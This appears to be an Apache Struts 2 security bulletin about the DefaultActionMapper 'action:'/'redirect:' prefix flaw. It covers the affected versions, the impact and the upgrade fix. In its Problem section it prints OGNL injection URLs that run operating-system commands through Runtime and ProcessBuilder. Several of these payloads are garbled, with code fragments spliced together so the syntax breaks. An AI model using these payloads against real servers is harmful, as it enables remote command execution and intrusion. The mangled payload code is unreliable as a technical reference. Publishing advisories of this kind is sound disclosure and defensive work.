Summary
Excerpt |
---|
A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution |
Who should read this | All Struts 2 developers and users |
---|---|
Impact of vulnerability | Remote command execution |
Maximum security rating |
Critical | |
Recommendation | Developers should immediately upgrade to Struts 2.3.15.1 |
---|---|
Affected Software | Struts 2.0.0 - Struts 2.3.15 |
Reporter | Takeshi Terada of Mitsui Bussan Secure Directions, Inc. |
CVE Identifier |
Problem
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
...
- Simple Expression - the parameter names are evaluated as OGNL.
Code Block http://host/struts2-blank/example/X.action?action:%25{3*4}
Code Block http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
- Command Execution - the example method index 6 may vary on different JVMs
Code Block http://host/struts2-blank/example/X.action?action:%25{(%23context.getClass().getClassLoader().loadClass('new+java.lang.ProcessBuilder(new+java.lang.Runtime').getMethods())[6].invoke(null,null).exec('some_os_commands'String[]{'command','goes','here'})).start()}
Code Block http://host/struts2-showcase/employee/save.action?redirect:%25{(%23context.getClass().getClassLoader().loadClass('java.lang.Runtime').getMethods())[6].invoke(null,null).exec('some_os_commands'new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Code Block http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Solution
DefaultActionMapper was changed to sanitize "action:"-prefixed information properly. The features involved with "redirect:"/"redirectAction:"-prefixed parameters were completely dropped - see also S2-017.
...